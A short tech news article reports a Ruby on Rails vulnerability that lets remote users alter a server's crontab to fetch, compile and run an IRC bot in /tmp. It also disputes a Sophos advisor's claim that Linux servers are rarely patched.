POPULAR web server software framework Ruby on Rails has a security vulnerability that could effectively give control of web servers to third parties.
Ruby on Rails was an extremely fashionable way to rapidly develop web based applications a few years ago, and while its popularity has waned somewhat in recent years it is still a common framework for mid-sized web applications. However security researcher Jeff Jarmoc has found a security vulnerability that could lead to web servers being hijacked if left unpatched.
Jarmoc detailed the effect of the vulnerability by explaining that a remote user can edit the web server's crontab to download a file to the /tmp directory where it is compiled and executed. The compiled program, which connects to an IRC server, in itself might not be particularly threatening, but the fact that the framework allows a remote user to download code, compile it and execute it on the web server is a serious security vulnerability.
The script Jarmoc details has been around for a number of years and exploits the fact that on Linux and BSD Unix systems the /tmp directory is world writeable. Typically webservers such as Apache store temporary data in the /tmp directory, but through the use of Apache modules such as mod_security the vulnerability can be mitigated, though not eliminated completely.
Chester Wisniewski, senior security advisor at Sophos said Linux web servers are high value targets, adding, "Anytime there is a vulnerability in a widely deployed software stack like Ruby on Rails it takes years for all of the server administrators around the world to get around to patching it."
However Wisniewski made a puzzling and inaccurate FUD-like comment by suggesting that the vulnerability is made worse because it targets Linux servers. He said, "In fact it is likely far worse on Linux computers, which are perceived to be more secure and are not patched on a regular schedule like Windows, Java, Flash and other widely exploited software packages."
While it is true that Linux distributions don't have routine events similar to Microsoft's Patch Tuesday, there is little or no basis to Wisniewski's claim that systems running Linux do not get patched regularly. The open source community makes patches available as soon as they are developed and tested rather than waiting for the first Tuesday of every month, and many Linux distributions provide these software updates automatically over the internet. Given that most security updates can be automatically applied for particularly lazy system administrators without the need for a system restart, one has to wonder why Wisniewski made such a sweeping, misleading statement.
Frequency of software updates aside, system administrators should update their installations of Ruby on Rails. µ
Sign up for INQbot – a weekly roundup of the best from the INQ